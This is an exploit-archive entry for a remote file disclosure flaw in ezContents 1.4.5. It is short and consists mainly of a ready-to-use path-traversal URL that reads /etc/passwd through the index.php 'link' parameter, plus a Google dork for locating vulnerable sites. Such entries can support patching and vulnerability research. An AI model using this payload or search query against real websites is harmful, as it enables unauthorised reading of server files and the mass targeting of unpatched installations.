id: 2340
date: 12/05/2007
title: ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability
author: p4imi0
cves: 

======================================================================
ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability
======================================================================




--------------------------------------------------------------
ezContents Version 1.4.5 Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://www.visualshapers.com/
author      : p4imi0
exploit     : /ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"index.php?link=" Powered by ezContents Version 1.4.5
thanks to   : str0ke, Cr[]w.



#  0day.today [2023-03-24]  #